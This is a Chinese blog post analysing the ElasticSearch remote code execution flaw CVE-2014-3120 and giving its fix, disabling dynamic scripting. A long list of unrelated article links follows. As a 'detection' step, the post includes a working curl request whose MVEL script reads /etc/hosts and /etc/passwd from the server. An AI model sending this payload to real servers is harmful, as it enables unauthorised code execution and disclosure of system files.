横云断岭
横云断岭

ElasticSearch远程任意代码执行漏洞(CVE-2014-3120)分析

原理

这个漏洞实际上非常简单,ElasticSearch有脚本执行(scripting)的功能,可以很方便地对查询出来的数据再加工处理。

ElasticSearch用的脚本引擎是MVEL,这个引擎没有做任何的防护,或者沙盒包装,所以直接可以执行任意代码。

而在ElasticSearch里,默认配置是打开动态脚本功能的,因此用户可以直接通过http请求,执行任意代码。

其实官方是清楚这个漏洞的,在文档里有说明:

First, you should not run Elasticsearch as the root user, as this would allow a script to access or do anything on your server, without limitations. Second, you should not expose Elasticsearch directly to users, but instead have a proxy application inbetween. 


检测方法

在线检测:

http://tool.scanv.com/es.html          可以检测任意地址

http://bouk.co/blog/elasticsearch-rce/poc.html   只检测localhost,不过会输出/etc/hosts和/etc/passwd文件的内容到网页上

自己手动检测:

curl -XPOST 'http://localhost:9200/_search?pretty' -d '
{
  "size": 1,
  "query": {
    "filtered": {
      "query": {
        "match_all": {}
      }
    }
  },
  "script_fields": {
    "/etc/hosts": {
      "script": "import java.util.*;\nimport java.io.*;\nnew Scanner(new File(\"/etc/hosts\")).useDelimiter(\"\\\\Z\").next();"
    },
    "/etc/passwd": {
      "script": "import java.util.*;\nimport java.io.*;\nnew Scanner(new File(\"/etc/passwd\")).useDelimiter(\"\\\\Z\").next();"
    }
  }
}
'

处理办法

关掉执行脚本功能,在配置文件elasticsearch.yml里为每一个结点都加上:

script.disable_dynamic: true

http://www.elasticsearch.org/guide/en/elasticsearch/reference/current/modules-scripting.html#_disabling_dynamic_scripts

官方会在1.2版本默认关闭动态脚本。

https://github.com/elasticsearch/elasticsearch/issues/5853

参考:

http://www.elasticsearch.org/guide/en/elasticsearch/reference/current/modules-scripting.html

http://www.elasticsearch.org/guide/en/elasticsearch/reference/current/search-request-script-fields.html

http://bouk.co/blog/elasticsearch-rce/

你可能感兴趣的:(安全,ElasticSearch)

  • 【Jenkins】持续集成与交付 (五):Jenkins用户权限管理 Seal^_^ 【云原生】容器化与编排技术持续集成#JenkinsjenkinsJenkins用户权限管理配置JenkinsJenkins用户的权限持续集成与交付
    【Jenkins】持续集成与交付(五):Jenkins用户权限管理1、安装插件(Role-basedAuthorizationStrategy)2、开启权限全局安全配置3、创建角色4、创建用户5、给用户分配角色6、测试权限TheBegin点点关注,收藏不迷路1、安装插件(Role-basedAuthorizationStrategy)首先,我们需要安装Role-basedAuthorization
  • 喜报|JumpServer信创堡垒机入选2024年浙江省信息技术应用创新解决方案 FIT2CLOUD飞致云 开源JumpServer堡垒机运维
    2025年1月22日,中国领先的开源软件公司飞致云宣布,其JumpServer信创堡垒机解决方案成功入选“2024年浙江省信息技术应用创新优秀典型解决方案”。“2024年浙江省信息技术应用创新优秀典型解决方案”的征集与评选活动由浙江省经济和信息化厅、中共浙江省委网络安全和信息化委员会办公室、浙江省密码管理局、工业和信息化部网络安全产业发展中心(工业和信息化部信息中心)主办。此项活动以“进一步深化行
  • Command Center AI 由数入道 应急管理人工智能机器学习智能体
    CommandCenterAI是一种先进的智能决策支持系统,专门用于应急指挥和资源调度管理,尤其在高压、复杂的环境中,如自然灾害应对、军事指挥、城市公共安全等领域,帮助决策者做出快速、有效的响应。它集成了大数据处理、实时情报分析、优化调度、决策模拟等功能,为指挥官提供多维度的决策支持。1.CommandCenterAI的核心功能1.1实时数据整合与情报分析CommandCenterAI需要从多个数
  • JavaScript原型链污染漏洞分析 漏洞安全
    原型链污染漏洞CVE:1、yargs-Parser输入验证错误漏洞(CVE-2020-7608)2、tough-cookie安全漏洞(CVE-2023-26136)3、JSON5原型污染漏洞(CVE-2022-46175)漏洞描述:1、yargs-Parser输入验证错误漏洞(CVE-2020-7608):yargs-parser是一款选项解析器。yargs-parser13.1.2之前版本、14
  • 【2025优质学术推荐】征稿控制科学、仪器、智能系统、通信、计算机、电子信息、人工智能、大数据、机器学习、软件工程、网络安全方向 努力学习的大大 学术会议推荐人工智能大数据深度学习神经网络
    【2025优质学术推荐】征稿控制科学、仪器、智能系统、通信、计算机、电子信息、人工智能、大数据、机器学习、软件工程、网络安全方向【2025优质学术推荐】征稿控制科学、仪器、智能系统、通信、计算机、电子信息、人工智能、大数据、机器学习、软件工程、网络安全方向文章目录【2025优质学术推荐】征稿控制科学、仪器、智能系统、通信、计算机、电子信息、人工智能、大数据、机器学习、软件工程、网络安全方向2025
  • 优雅驾驭 TryParse:技巧与实战全攻略 东百牧码人 c#数据结构
    一、引言在编程的世界里,数据类型的转换是我们经常会遇到的操作。而TryParse方法作为一种安全、高效的类型转换方式,在许多编程语言中都有着广泛的应用,比如C#、Java等。它能够帮助我们在将字符串转换为其他数据类型时,避免因格式不正确而引发的异常,使我们的程序更加健壮和稳定。今天,咱们就来聊聊如何优雅地使用TryParse,让你的代码既简洁又高效,展现出编程的艺术之美。二、TryParse基础解
  • Windows系统加固 泷羽Sec-pp windows安全
    一、身份鉴别1.密码安全策略位置:开始—>管理工具—>本地安全策略—>账户策略—>密码策略。加固设置:(1)开启密码复杂度:使用数字、大小写字母、特殊符号等(2)密码长度最小值为8个字符(3)密码最短使用期限30天(4)密码最长使用期限90天(5)强制密码历史5个2.账户锁定策略位置:开始—>管理工具—>本地安全策略—>账户策略—>账号锁定策略。加固设置:(1)账户锁定时间30分钟(2)账户锁定阈
  • 从 TCP/IP 演进看按序流与性能 dog250 tcp/ip网络协议网络
    前面谈到互联网从早期对等通信模型转入后来内容分发模型后的一系列问题,诸如拥塞,安全等,本文谈谈关于性能的更普遍方面。TCP/IP祖师爷1974年的开山论文AProtocolforPacketNetworkIntercommunication以及随后RFC675,标志着TCP/IP的正式诞生,在此之前还有一个里程碑事件,即RFC33NCP标准化。RFC33解决了分布式通信问题,而RFC675解决了异
  • 2025年全国CTF夺旗赛-从零基础入门到竞赛,看这一篇就稳了! 白帽安全-黑客4148 网络安全web安全linux密码学CTFpythonddos
    基于入门网络安全/黑客打造的:黑客&网络安全入门&进阶学习资源包目录一、CTF简介二、CTF竞赛模式三、CTF各大题型简介四、CTF学习路线4.1、初期1、html+css+js(2-3天)2、apache+php(4-5天)3、mysql(2-3天)4、python(2-3天)5、burpsuite(1-2天)4.2、中期1、SQL注入(7-8天)2、文件上传(7-8天)3、其他漏洞(14-15
  • Java创建型模式(一)——单例设计模式(饿汉式、懒汉式、枚举式,以及序列化反序列化破环单例模式和反射破环单例模式及破环单例模式的解决办法 | 完成详解,附有代码+案例) 蔚一 Java知识java设计模式开发语言intellij-idea单例模式
    文章目录单例设计模式4.1.1单例模式的结构4.1.2单例模式的实现4.1.2.1饿汉式-静态变量方式4.1.2.2饿汉式-静态代码块方式4.1.2.3懒汉式-线程不安全4.1.2.4懒汉式-线程安全4.1.2.5懒汉式-双重检查锁4.1.2.6饿汉式—枚举类4.3单例模式存在的问题4.3.1序列化反序列化破环单例模式4.3.2反射破环单例模式4.4解决单例模式存在的问题4.4.1序列化、反序列方
  • Python实现SMTP自动发邮件全流程指南 福建低调
    本文还有配套的精品资源,点击获取简介:SMTP是互联网用于发送电子邮件的标准协议,Python提供便利的库来实现这一功能。本文将介绍如何利用Python的smtplib和email.mime库通过SMTP自动发送邮件,包括设置服务器、登录验证、构建邮件对象、发送邮件,并提供了一个代码示例。文章还强调安全性和常见问题的解决方案,为初学者提供详细步骤和视觉辅助。1.SMTP协议基础在互联网技术飞速发展
  • 第11篇:你知道ElasticSearch聚合分析能力有多强? 老王随聊 elasticsearch搜索引擎大数据
    背景:目前国内有大量的公司都在使用Elasticsearch,包括阿里、京东、滴滴、今日头条、小米、vivo等诸多知名公司。除了搜索功能之外,Elasticsearch还结合Kibana、Logstash、ElasticStack还被广泛运用在大数据近实时分析领域,包括日志分析、指标监控等多个领域。本节内容:ElasticSearch强悍聚合分析能力详解。目录1、ES的聚合Aggregations
  • Elasticsearch聚合分析:未来发展趋势 AI天才研究院 计算AI大模型企业级应用开发实战ChatGPT计算科学神经计算深度学习神经网络大数据人工智能大型语言模型AIAGILLMJavaPython架构设计AgentRPA
    1.背景介绍1.1大数据时代的分析需求随着互联网、物联网、移动互联网等技术的快速发展,全球数据量呈现爆炸式增长,我们正步入一个前所未有的大数据时代。海量数据的背后蕴藏着巨大的商业价值,如何高效地存储、管理、分析和挖掘这些数据,成为企业和组织面临的重大挑战。1.2Elasticsearch:分布式搜索和分析引擎Elasticsearch作为一个开源的分布式搜索和分析引擎,凭借其高性能、可扩展性和易用
  • centos7安装jumpserver堡垒机 落花_忆流年 运维项目linux
    堡垒机简介跳板机属于内控堡垒机范畴,是一种用于单点登陆的主机应用系统。跳板机就是一台服务器,维护人员在维护过程中,首先要统一登录到这台服务器上,然后从这台服务器再登录到目标设备进行维护。但跳板机的缺点是没有实现对运维人员操作行为的控制和审计,出现误操作或违规操作难以定位到原因和责任人;并且跳板机存在严重的安全风险,如果跳板机系统被攻入,则后端资源完全暴露无遗。对于个别资源(如telnet)可以通过
  • 堡垒机进化史:从跳板机到云端智能守护者的华丽蜕变 不知 不知 linux服务器windows网络安全
    堡垒机的发展第一代堡垒机:跳板机的局限性第二代堡垒机:安全与审计的强化第三代堡垒机:多样化协议与云端化部署堡垒机的技术架构与核心功能未来发展趋势堡垒机,作为网络安全体系中的重要组成部分,其发展历程充满了技术的迭代与需求的驱动。从最初的跳板机概念到如今高度智能化的云堡垒机,堡垒机的发展历程大致可以分为三个阶段。第一代堡垒机:跳板机的局限性堡垒机的理念最早起源于跳板机。2000年左右,中大型企业为了能
  • Python知识点:基于Python技术,如何使用AirSim进行无人机模拟 超哥同学 Python系列python无人机开发语言面试编程
    开篇,先说一个好消息,截止到2025年1月1日前,翻到文末找到我,赠送定制版的开题报告和任务书,先到先得!过期不候!如何使用Python和AirSim进行无人机模拟无人机技术的发展为许多行业带来了革命性的变化,尤其是在航拍、物流配送和农业监测等领域。然而,无人机的操作和开发需要一个安全且可控的环境来进行测试和训练。AirSim就是这样一个模拟器,它提供了一个基于UnrealEngine的逼真环境,
  • 企业级应用框架guns架构与开发实践 福建低调
    本文还有配套的精品资源,点击获取简介:在IT领域,企业架构是组织信息和技术集成设计的关键。"guns"项目提供了一套高效、灵活且可扩展的企业管理架构设计框架。本文深入探讨guns项目的核心特性、应用场景和开发实践,以及如何使用不同的集成开发环境(IDE)进行项目开发。guns基于SpringBoot框架,集成MyBatis和Shiro,简化了微服务开发和权限控制,确保了数据安全。文章还详细介绍了g
  • 【笔记总结】华为云:应用上云后的安全规划及设计 通信_楠木 笔记华为云安全系统架构安全架构
    一、背景和问题数字化时代,随着信息技术的飞速发展,企业和各类组织纷纷将自身的应用程序迁移至云端。云计算凭借其诸多优势,如成本效益、可扩展性、灵活性以及便捷的资源共享等,已然成为了现代业务运营的重要支撑。今年,我所在企业也将IT系统全面迁移上云,究其原因是为了在激烈的市场竞争中保持敏捷性和创新性,需要快速部署新的应用并实现高效的数据处理,云平台提供的丰富资源和便捷的服务模式使其能够迅速满足这些需求。
  • 全面解析物联网信息安全知识体系 无声远望
    本文还有配套的精品资源,点击获取简介:本资料集详细介绍物联网信息安全的多个重要方面,包括基础概念、数学基础、数据安全与隐私保护、集成安全技术、安全分析、防护策略和身份认证。从基本的物联网安全概念到深度探讨密码学基础,再到数据保护技术,再到全面的系统安全设计,安全分析,防御措施以及身份验证技术,这些内容将为研究者、开发者和管理者提供物联网安全的全面视角。1.物联网信息安全基础概念在现代技术不断发展的
  • 网络安全态势感知:企业数字化转型的 “安全密钥” 知白守黑V 安全运营网络安全态势感知网络
    在数字经济飞速发展的当下,网络安全已经成为企业平稳运营的关键所在。从大型企业的数据泄露事故,到中小企业遭遇的各类网络攻击,网络安全威胁无处不在。而网络安全态势感知产品,作为应对复杂网络威胁的关键技术,正逐渐成为企业守护数字资产的“智慧大脑”。一、态势感知:全景掌控,精准防御你可以把网络安全态势感知想象成企业网络的“超级侦察兵”。它借助大数据分析、机器学习这些先进技术,就像是拥有了超级强大的“洞察力
  • 数据库管理系统的数据控制功能 橘子熊-0 数据库
    数据库管理系统提供下述4个方面的数据控制功能:(1)数据的安全性控制:防止不合法使用数据库造成数据的泄露和破坏,使每个用户只能按其规定对某些数据进行某种或某些操作和处理。安全性控制是指要尽可能杜绝所有可能的数据库非法访问。数据的安全性是保护数据库以防止不合法使用造成的数据泄露、更改或破坏。安全性措施:①用户标识和鉴定。通过定义用户标识对用户身份进行鉴定,只允许合法用户才能进入系统。②用户存取权限控
  • 网络安全从入门到精通(特别篇I):Linux安全事件应急响应之Linux应急响应基础必备技能 HACKNOE 网络安全应急响应科研室web安全linux安全网络安全
    网络安全应急响应1.Linux应急响应1.1询问攻击情况范围1.2应急排查思路1.3判断事件类型1.4信息收集:1.5备份所有信息1.6断开网络1.6.1重启/禁用网卡1.6.1.1Centos6重启所有网卡1.6.1.2Centos7重启所有网卡1.6.2重启单个eth0网卡1.6.2.1禁用单个eth0网卡1.6.2.2重启/禁用网卡1.6.2.3长期禁用一块网卡1.6.3云上阻断异常网络通信
  • 前端 | 浏览器安全:XSS攻击、CSRF攻击、中间人攻击 酒酿泡芙1217 前端安全xsscsrf
    1.XSS攻击1.1什么是XSS攻击XSS攻击指的是跨站脚本攻击,是一种代码注入攻击。攻击者通过在网站注入恶意脚本,使之在用户的浏览器上运行,从而盗用用户的信息如cookie等本质是因为网站没有对恶意代码进行过滤,与正常的代码混合在一起了,浏览器没有办法分辨那些脚本是可信的,从而导致了恶意代码的执行攻击者通过这种攻击方式可以进行一下操作:获取页面的数据,如DOM、cookie、localStora
  • Java 不可变集合全面解析 吉安. 开发语言java
    在Java编程中,不可变集合是一种特殊类型的集合,一旦创建,其内容就不能被修改。这种特性使得不可变集合在某些场景下具有独特的优势。创建不可变集合的应用场景数据不可修改的场景:当某个数据不应该被修改时,将其防御性地拷贝到不可变集合中是一种很好的实践。例如,一些配置信息、常量数据等,将它们放在不可变集合中,可以确保在程序运行过程中其内容不会被意外修改。安全调用不可信库:当集合对象需要被不可信的库调用时
  • 第72期 | GPTSecurity周报 云起无垠 GPTSecurity人工智能安全
    GPTSecurity是一个涵盖了前沿学术研究和实践经验分享的社区,集成了生成预训练Transformer(GPT)、人工智能生成内容(AIGC)以及大语言模型(LLM)等安全领域应用的知识。在这里,您可以找到关于GPT/AIGC/LLM最新的研究论文、博客文章、实用的工具和预设指令(Prompts)。现为了更好地知悉近一周的贡献内容,现总结如下。SecurityPapers1.从孤立指令到互动鼓
  • 参加【2025年春季】全国CTF夺旗赛-从零基础入门到竞赛,看这一篇就稳了! 白帽子凯哥 web安全学习安全CTF夺旗赛网络安全
    基于入门网络安全/黑客打造的:黑客&网络安全入门&进阶学习资源包目录一、CTF简介二、CTF竞赛模式三、CTF各大题型简介四、CTF学习路线4.1、初期1、html+css+js(2-3天)2、apache+php(4-5天)3、mysql(2-3天)4、python(2-3天)5、burpsuite(1-2天)4.2、中期1、SQL注入(7-8天)2、文件上传(7-8天)3、其他漏洞(14-15
  • 参加【2025年春季】全国CTF夺旗赛-从零基础入门到竞赛,看这一篇就稳了! 白帽子凯哥 web安全学习安全CTF夺旗赛网络安全
    基于入门网络安全/黑客打造的:黑客&网络安全入门&进阶学习资源包目录一、CTF简介二、CTF竞赛模式三、CTF各大题型简介四、CTF学习路线4.1、初期1、html+css+js(2-3天)2、apache+php(4-5天)3、mysql(2-3天)4、python(2-3天)5、burpsuite(1-2天)4.2、中期1、SQL注入(7-8天)2、文件上传(7-8天)3、其他漏洞(14-15
  • 浅析 SSH 免密登录原理 jax不摆烂 网络网络服务器
    SSH(SecureShell)是一种网络协议,可以在不安全的网络中提供一种安全的加密通信方式。SSH免密登录是指用户在登录远程主机时,无需输入密码即可完成登录,免去每次登录时输入密码的烦恼。这种方式既提高了用户的操作便捷性,又避免了使用简单密码的风险,极大地提高了登录的安全性。本文旨在以简单易懂的方式解释SSH免密登录的原理。SSH免密登录原理非对称加密在了解SSH免密登录原理之前,我们需要先了
  • 安全可靠测评结果公告(2024年第1号) Kunpeng_Ascend小白 服务器科技政务
    附表一、中央处理器(CPU)(同一等级按产品名称首字笔画为序排列)序号产品名称送测单位安全可靠等级1飞腾腾云S5000C飞腾信息技术有限公司Ⅱ级2飞腾腾珑E2000飞腾信息技术有限公司Ⅱ级3飞腾腾锐D3000飞腾信息技术有限公司Ⅱ级4龙芯3A5000(DA版)龙芯中科技术股份有限公司Ⅱ级5龙芯3A6000龙芯中科技术股份有限公司Ⅱ级6龙芯3C5000龙芯中科技术股份有限公司Ⅱ级7龙芯3D5000龙
  • redis清空缓存 奔跑吧邓邓子 高效运维缓存redis数据库
    提示:“奔跑吧邓邓子”的高效运维专栏聚焦于各类运维场景中的实际操作与问题解决。内容涵盖服务器硬件(如IBMSystem3650M5)、云服务平台(如腾讯云、华为云)、服务器软件(如Nginx、Apache、GitLab、Redis、Elasticsearch、Kubernetes、Docker等)、开发工具(如Git、HBuilder)以及网络安全(如挖矿病毒排查、SSL证书配置)等多个方面。无论
  • java解析APK 3213213333332132 javaapklinux解析APK
    解析apk有两种方法 1、结合安卓提供apktool工具,用java执行cmd解析命令获取apk信息 2、利用相关jar包里的集成方法解析apk 这里只给出第二种方法,因为第一种方法在linux服务器下会出现不在控制范围之内的结果。 public class ApkUtil { /** * 日志对象 */ private static Logger
  • nginx自定义ip访问N种方法 ronin47 nginx 禁止ip访问
       因业务需要,禁止一部分内网访问接口, 由于前端架了F5,直接用deny或allow是不行的,这是因为直接获取的前端F5的地址。    所以开始思考有哪些主案可以实现这样的需求,目前可实施的是三种:    一:把ip段放在redis里,写一段lua           二:利用geo传递变量,写一段
  • mysql timestamp类型字段的CURRENT_TIMESTAMP与ON UPDATE CURRENT_TIMESTAMP属性 dcj3sjt126com mysql
    timestamp有两个属性,分别是CURRENT_TIMESTAMP 和ON UPDATE CURRENT_TIMESTAMP两种,使用情况分别如下:   1.   CURRENT_TIMESTAMP    当要向数据库执行insert操作时,如果有个timestamp字段属性设为   CURRENT_TIMESTAMP,则无论这
  • struts2+spring+hibernate分页显示 171815164 Hibernate
    分页显示一直是web开发中一大烦琐的难题,传统的网页设计只在一个JSP或者ASP页面中书写所有关于数据库操作的代码,那样做分页可能简单一点,但当把网站分层开发后,分页就比较困难了,下面是我做Spring+Hibernate+Struts2项目时设计的分页代码,与大家分享交流。   1、DAO层接口的设计,在MemberDao接口中定义了如下两个方法: public in
  • 构建自己的Wrapper应用 g21121 rap
            我们已经了解Wrapper的目录结构,下面可是正式利用Wrapper来包装我们自己的应用,这里假设Wrapper的安装目录为:/usr/local/wrapper。           首先,创建项目应用   &nb
  • [简单]工作记录_多线程相关 53873039oycg 多线程
         最近遇到多线程的问题,原来使用异步请求多个接口(n*3次请求)     方案一 使用多线程一次返回数据,最开始是使用5个线程,一个线程顺序请求3个接口,超时终止返回     缺点       测试发现必须3个接
  • 调试jdk中的源码,查看jdk局部变量 程序员是怎么炼成的 jdk 源码
    转自:http://www.douban.com/note/211369821/    学习jdk源码时使用--   学习java最好的办法就是看jdk源代码,面对浩瀚的jdk(光源码就有40M多,比一个大型网站的源码都多)从何入手呢,要是能单步调试跟进到jdk源码里并且能查看其中的局部变量最好了。 可惜的是sun提供的jdk并不能查看运行中的局部变量
  • Oracle RAC Failover 详解 aijuans oracle
    Oracle RAC 同时具备HA(High Availiablity) 和LB(LoadBalance). 而其高可用性的基础就是Failover(故障转移). 它指集群中任何一个节点的故障都不会影响用户的使用,连接到故障节点的用户会被自动转移到健康节点,从用户感受而言, 是感觉不到这种切换。 Oracle 10g RAC 的Failover 可以分为3种: 1. Client-Si
  • form表单提交数据编码方式及tomcat的接受编码方式 antonyup_2006 JavaScripttomcat浏览器互联网servlet
    原帖地址:http://www.iteye.com/topic/266705 form有2中方法把数据提交给服务器,get和post,分别说下吧。 (一)get提交 1.首先说下客户端(浏览器)的form表单用get方法是如何将数据编码后提交给服务器端的吧。    对于get方法来说,都是把数据串联在请求的url后面作为参数,如:http://localhost:
  • JS初学者必知的基础 百合不是茶 js函数js入门基础
    JavaScript是网页的交互语言,实现网页的各种效果, JavaScript 是世界上最流行的脚本语言。 JavaScript 是属于 web 的语言,它适用于 PC、笔记本电脑、平板电脑和移动电话。 JavaScript 被设计为向 HTML 页面增加交互性。 许多 HTML 开发者都不是程序员,但是 JavaScript 却拥有非常简单的语法。几乎每个人都有能力将小的
  • iBatis的分页分析与详解 bijian1013 javaibatis
            分页是操作数据库型系统常遇到的问题。分页实现方法很多,但效率的差异就很大了。iBatis是通过什么方式来实现这个分页的了。查看它的实现部分,发现返回的PaginatedList实际上是个接口,实现这个接口的是PaginatedDataList类的对象,查看PaginatedDataList类发现,每次翻页的时候最
  • 精通Oracle10编程SQL(15)使用对象类型 bijian1013 oracle数据库plsql
    /* *使用对象类型 */ --建立和使用简单对象类型 --对象类型包括对象类型规范和对象类型体两部分。 --建立和使用不包含任何方法的对象类型 CREATE OR REPLACE TYPE person_typ1 as OBJECT( name varchar2(10),gender varchar2(4),birthdate date ); drop type p
  • 【Linux命令二】文本处理命令awk bit1129 linux命令
    awk是Linux用来进行文本处理的命令,在日常工作中,广泛应用于日志分析。awk是一门解释型编程语言,包含变量,数组,循环控制结构,条件控制结构等。它的语法采用类C语言的语法。   awk命令用来做什么? 1.awk适用于具有一定结构的文本行,对其中的列进行提取信息 2.awk可以把当前正在处理的文本行提交给Linux的其它命令处理,然后把直接结构返回给awk 3.awk实际工
  • JAVA(ssh2框架)+Flex实现权限控制方案分析 白糖_ java
      目前项目使用的是Struts2+Hibernate+Spring的架构模式,目前已经有一套针对SSH2的权限系统,运行良好。但是项目有了新需求:在目前系统的基础上使用Flex逐步取代JSP,在取代JSP过程中可能存在Flex与JSP并存的情况,所以权限系统需要进行修改。 【SSH2权限系统的实现机制】 权限控制分为页面和后台两块:不同类型用户的帐号分配的访问权限是不同的,用户使
  • angular.forEach boyitech AngularJSAngularJS APIangular.forEach
    angular.forEach 描述: 循环对obj对象的每个元素调用iterator, obj对象可以是一个Object或一个Array. Iterator函数调用方法: iterator(value, key, obj), 其中obj是被迭代对象,key是obj的property key或者是数组的index,value就是相应的值啦. (此函数不能够迭代继承的属性.)
  • java-谷歌面试题-给定一个排序数组,如何构造一个二叉排序树 bylijinnan 二叉排序树
    import java.util.LinkedList; public class CreateBSTfromSortedArray { /** * 题目:给定一个排序数组,如何构造一个二叉排序树 * 递归 */ public static void main(String[] args) { int[] data = { 1, 2, 3, 4,
  • action执行2次 Chen.H JavaScriptjspXHTMLcssWebwork
    xwork 写道 <action name="userTypeAction" class="com.ekangcount.website.system.view.action.UserTypeAction"> <result name="ssss" type="dispatcher">
  • [时空与能量]逆转时空需要消耗大量能源 comsci 能源
            无论如何,人类始终都想摆脱时间和空间的限制....但是受到质量与能量关系的限制,我们人类在目前和今后很长一段时间内,都无法获得大量廉价的能源来进行时空跨越.....         在进行时空穿梭的实验中,消耗超大规模的能源是必然
  • oracle的正则表达式(regular expression)详细介绍 daizj oracle正则表达式
        正则表达式是很多编程语言中都有的。可惜oracle8i、oracle9i中一直迟迟不肯加入,好在oracle10g中终于增加了期盼已久的正则表达式功能。你可以在oracle10g中使用正则表达式肆意地匹配你想匹配的任何字符串了。 正则表达式中常用到的元数据(metacharacter)如下: ^ 匹配字符串的开头位置。 $ 匹配支付传的结尾位置。 *
  • 报表工具与报表性能的关系 datamachine 报表工具birt报表性能润乾报表
    在选择报表工具时,性能一直是用户关心的指标,但是,报表工具的性能和整个报表系统的性能有多大关系呢? 要回答这个问题,首先要分析一下报表的处理过程包含哪些环节,哪些环节容易出现性能瓶颈,如何优化这些环节。   一、报表处理的一般过程分析 1、用户选择报表输入参数后,报表引擎会根据报表模板和输入参数来解析报表,并将数据计算和读取请求以SQL的方式发送给数据库。   2、
  • 初一上学期难记忆单词背诵第一课 dcj3sjt126com wordenglish
    what 什么  your 你 name 名字 my 我的 am 是 one 一 two 二 three 三 four 四 five 五 class 班级,课   six 六 seven 七 eight 八 nince 九 ten 十 zero 零 how 怎样 old 老的 eleven 十一 twelve 十二 thirteen
  • 我学过和准备学的各种技术 dcj3sjt126com 技术
    语言VB https://msdn.microsoft.com/zh-cn/library/2x7h1hfk.aspxJava http://docs.oracle.com/javase/8/C# https://msdn.microsoft.com/library/vstudioPHP http://php.net/manual/en/Html 
  • struts2中token防止重复提交表单 蕃薯耀 重复提交表单struts2中token
    struts2中token防止重复提交表单   >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> 蕃薯耀 2015年7月12日 11:52:32 星期日 ht
  • 线性查找二维数组 hao3100590 二维数组
    1.算法描述 有序(行有序,列有序,且每行从左至右递增,列从上至下递增)二维数组查找,要求复杂度O(n)   2.使用到的相关知识: 结构体定义和使用,二维数组传递(http://blog.csdn.net/yzhhmhm/article/details/2045816)   3.使用数组名传递 这个的不便之处很明显,一旦确定就是不能设置列值 //使
  • spring security 3中推荐使用BCrypt算法加密密码 jackyrong Spring Security
    spring security 3中推荐使用BCrypt算法加密密码了,以前使用的是md5, Md5PasswordEncoder 和 ShaPasswordEncoder,现在不推荐了,推荐用bcrpt Bcrpt中的salt可以是随机的,比如: int i = 0; while (i < 10) { String password = "1234
  • 学习编程并不难,做到以下几点即可! lampcy javahtml编程语言
    不论你是想自己设计游戏,还是开发iPhone或安卓手机上的应用,还是仅仅为了娱乐,学习编程语言都是一条必经之路。编程语言种类繁多,用途各 异,然而一旦掌握其中之一,其他的也就迎刃而解。作为初学者,你可能要先从Java或HTML开始学,一旦掌握了一门编程语言,你就发挥无穷的想象,开发 各种神奇的软件啦。 1、确定目标 学习编程语言既充满乐趣,又充满挑战。有些花费多年时间学习一门编程语言的大学生到
  • 架构师之mysql----------------用group+inner join,left join ,right join 查重复数据(替代in) nannan408 right join
    1.前言。   如题。 2.代码 (1)单表查重复数据,根据a分组   SELECT m.a,m.b, INNER JOIN (select a,b,COUNT(*) AS rank FROM test.`A` A GROUP BY a HAVING rank>1 )k ON m.a=k.a (2)多表查询 , 使用改为le
  • jQuery选择器小结 VS 节点查找(附css的一些东西) Everyday都不同 jquerycssname选择器追加元素查找节点
    最近做前端页面,频繁用到一些jQuery的选择器,所以特意来总结一下:   测试页面: <html> <head> <script src="jquery-1.7.2.min.js"></script> <script> /*$(function() { $(documen
  • 关于EXT tntxia ext
      ExtJS是一个很不错的Ajax框架,可以用来开发带有华丽外观的富客户端应用,使得我们的b/s应用更加具有活力及生命力。ExtJS是一个用 javascript编写,与后台技术无关的前端ajax框架。因此,可以把ExtJS用在.Net、Java、Php等各种开发语言开发的应用中。       ExtJs最开始基于YUI技术,由开发人员Jack
  • 一个MIT计算机博士对数学的思考 xjnine Math
     在过去的一年中,我一直在数学的海洋中游荡,research进展不多,对于数学世界的阅历算是有了一些长进。为什么要深入数学的世界?作为计算机的学生,我没有任何企图要成为一个数学家。我学习数学的目的,是要想爬上巨人的肩膀,希望站在更高的高度,能把我自己研究的东西看得更深广一些。说起来,我在刚来这个学校的时候,并没有预料到我将会有一个深入数学的旅程。我的导师最初希望我去做的题目,是对appe
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他